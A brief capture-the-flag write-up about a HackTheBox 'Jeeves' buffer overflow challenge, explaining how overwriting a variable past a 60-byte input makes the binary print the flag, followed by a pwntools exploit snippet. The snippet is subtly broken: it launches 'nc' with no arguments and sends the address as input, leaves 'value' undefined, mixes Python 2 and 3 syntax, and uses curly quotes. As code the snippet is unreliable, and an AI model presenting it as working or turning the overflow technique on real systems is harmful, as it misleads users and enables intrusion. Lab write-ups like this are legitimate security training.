We covered a scenario of a binary vulnerable to buffer overflow vulnerability. The binary has NX and PIE protections enabled so we opened the binary with Ghidra debugger and built the exploitation methodology based on calculating the offsets of the input variable and another variable that controls an entry to an if statement that prints the flag. The objective was to control the value of that binary and let the execution flow enter the if statement. This was part of HackTheBox Jeeves Intro to Binary Exploitation Track.
Buffer Overflow Techniques Notes
Exploit Code is below
##Beginning
from pwn import *
target = process(“nc”)
target.sendline(“ip port”)
payload = “A”*60
byte_to_string = p64(value)
payload = payload + byte_to_string.decode(“ISO-8859-1”)
target.sendline(payload)
print target.recvuntil(“.”)
##Ending
Video Walkthrough